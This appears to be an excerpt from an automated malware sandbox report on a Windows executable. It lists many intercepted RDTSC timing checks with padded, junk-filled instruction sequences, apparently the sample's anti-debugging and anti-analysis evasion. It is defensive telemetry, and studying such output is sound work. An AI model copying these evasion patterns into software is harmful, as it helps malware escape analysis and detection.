                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3143 second address: 11D3155 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5D692C6EE6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D328F second address: 11D3293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3293 second address: 11D3299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3299 second address: 11D32A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D32A5 second address: 11D32AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D32AB second address: 11D32B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D33EF second address: 11D33FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3874 second address: 11D3879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D3879 second address: 11D38C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5D692C6EF8h 0x00000008 jo 00007F5D692C6EE6h 0x0000000e jmp 00007F5D692C6EF9h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5D692C6EEDh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D38C7 second address: 11D38E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F5D68C8BFF6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D38E3 second address: 11D38E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D38E7 second address: 11D38ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D9512 second address: 11D9537 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F5D692C6EF8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D9537 second address: 11D954D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F5D68C8BFFDh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D8053 second address: 11D806A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEDh 0x00000007 jbe 00007F5D692C6EE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D806A second address: 11D8070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D8070 second address: 11D807F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EEBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D8333 second address: 11D8345 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D68C8BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F5D68C8BFF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D8D4D second address: 11D8D53 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D8D53 second address: 11D8D61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F5D68C8BFF6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D8D61 second address: 11D8D65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D8EB2 second address: 11D8ED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5D68C8BFF6h 0x00000009 jmp 00007F5D68C8C001h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 js 00007F5D68C8C009h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D8ED8 second address: 11D8F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EEDh 0x00000009 jmp 00007F5D692C6EF1h 0x0000000e jmp 00007F5D692C6EEDh 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D8F0B second address: 11D8F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 118AEF5 second address: 118AF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 popad 0x0000000a jne 00007F5D692C6F05h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D9313 second address: 11D933B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5D68C8C008h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F5D68C8BFF6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D933B second address: 11D933F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D933F second address: 11D9345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D9345 second address: 11D934F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D934F second address: 11D9353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11D9353 second address: 11D9359 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E1219 second address: 11E121D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E121D second address: 11E1223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E1385 second address: 11E138D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E138D second address: 11E1392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E1392 second address: 11E139E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E139E second address: 11E13A8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5D692C6EE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E1B96 second address: 11E1BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E1BA1 second address: 11E1BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EEAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E1BAF second address: 11E1BCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F5D68C8BFFEh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E1D3B second address: 11E1D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E5863 second address: 11E5867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E5867 second address: 11E5871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E5871 second address: 11E5875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AB4C1 second address: 11AB4C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AB4C5 second address: 11AB4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AB790 second address: 11AB7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007F5D692C6EEEh 0x0000000e mov eax, dword ptr [eax] 0x00000010 jmp 00007F5D692C6EF0h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AB7C4 second address: 11AB7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AB7C9 second address: 11AB7CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AB892 second address: 11AB898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AB9E1 second address: 11AB9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AC177 second address: 11AC191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C000h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AC191 second address: 11AC195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AC195 second address: 11AC199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11AC29B second address: 11AC2B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D692C6EF3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E5C6F second address: 11E5C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E5C75 second address: 11E5C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E5C7F second address: 11E5C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E5DDA second address: 11E5DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F5D692C6EEAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E5F3D second address: 11E5F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E6123 second address: 11E6129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E641C second address: 11E643C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5D68C8C00Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11E643C second address: 11E645C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F5D692C6EEAh 0x00000011 pushad 0x00000012 popad 0x00000013 jnl 00007F5D692C6EE6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 116C4FD second address: 116C503 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11ECB5A second address: 11ECB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11ECB62 second address: 11ECB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F5D68C8C001h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F163B second address: 11F163F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F163F second address: 11F1663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F5D68C8BFFEh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F5D68C8BFF6h 0x00000015 jne 00007F5D68C8BFF6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F17A0 second address: 11F17A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F17A6 second address: 11F17B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F7C5E second address: 11F7C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D692C6EF5h 0x00000009 jc 00007F5D692C6EE6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5D692C6EEBh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11ABC71 second address: 11ABCB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5D68C8C001h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F5D68C8BFF8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000004h 0x00000028 mov ch, F4h 0x0000002a nop 0x0000002b pushad 0x0000002c jbe 00007F5D68C8BFFCh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11ABCB3 second address: 11ABCDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5D692C6EEEh 0x00000012 pushad 0x00000013 jmp 00007F5D692C6EEBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F82E1 second address: 11F82E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F82E7 second address: 11F8304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F5D692C6EF8h 0x0000000b je 00007F5D692C6EE6h 0x00000011 jmp 00007F5D692C6EECh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F8304 second address: 11F8318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D68C8BFFAh 0x00000009 jnp 00007F5D68C8BFF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F8318 second address: 11F832C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F5D692C6EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F832C second address: 11F834D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5D68C8C004h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F834D second address: 11F8353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11F8C8B second address: 11F8CC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F5D68C8C007h 0x00000016 je 00007F5D68C8BFF8h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FE4C6 second address: 11FE4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FD832 second address: 11FD859 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5D68C8C009h 0x0000000d jns 00007F5D68C8BFF6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FD859 second address: 11FD85D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FD85D second address: 11FD868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FD9AB second address: 11FD9B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FD9B5 second address: 11FD9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FD9BD second address: 11FD9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FDCAE second address: 11FDCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F5D68C8BFF6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FDCBB second address: 11FDD28 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D692C6F09h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c jmp 00007F5D692C6EF7h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push esi 0x00000015 jmp 00007F5D692C6EF7h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop esi 0x0000001d push ebx 0x0000001e jno 00007F5D692C6EE6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FDE97 second address: 11FDEA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D68C8BFFEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FDEA9 second address: 11FDEAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11FDEAD second address: 11FDEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
